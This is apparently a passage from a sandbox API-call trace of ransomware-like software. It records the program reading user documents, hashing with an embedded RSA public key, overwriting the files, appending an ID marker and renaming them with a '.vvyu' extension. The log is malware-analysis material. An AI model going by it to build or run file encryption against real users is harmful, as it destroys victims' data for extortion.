(lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.301] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0196.302] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.302] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.302] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.302] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.302] GetLastError () returned 0x0 [0196.302] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.302] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0196.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.302] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.302] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.302] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5230) returned 0x2ea79b0 [0196.303] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea16e0 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1728 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.304] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0196.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e40 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2e28 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.306] GetCurrentThreadId () returned 0x66c [0196.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5140 [0196.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.307] GetCurrentThreadId () returned 0x66c [0196.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e40 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ea0 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2eb8 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e58 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e28 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1728 | out: hHeap=0x620000) returned 1 [0196.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.318] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x5229, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x5229, lpOverlapped=0x0) returned 1 [0196.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.318] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x522e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.318] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.320] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.320] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.320] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.320] CloseHandle (hObject=0x568) returned 1 [0196.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.322] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\jkSu2OlxWSDLnSWvMq.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\jksu2olxwsdlnswvmq.ods"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\jkSu2OlxWSDLnSWvMq.ods.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\jksu2olxwsdlnswvmq.ods.vvyu")) returned 1 [0196.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.324] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.327] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f0acfc0, ftCreationTime.dwHighDateTime=0x1d89e12, ftLastAccessTime.dwLowDateTime=0x8de5e560, ftLastAccessTime.dwHighDateTime=0x1d89f9f, ftLastWriteTime.dwLowDateTime=0x8de5e560, ftLastWriteTime.dwHighDateTime=0x1d89f9f, nFileSizeHigh=0x0, nFileSizeLow=0xe3f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="naiagGM8S5tSkx.docx", cAlternateFileName="NAIAGG~1.DOC")) returned 1 [0196.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.328] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\naiagGM8S5tSkx.docx") returned=".docx" [0196.328] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\naiagGM8S5tSkx.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\naiaggm8s5tskx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.329] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=58357) returned 1 [0196.329] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.331] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xe3cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.331] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.337] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.337] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xe3f5, lpOverlapped=0x0) returned 1 [0196.339] lstrlenA (lpString="-----BEGIN PUBLIC 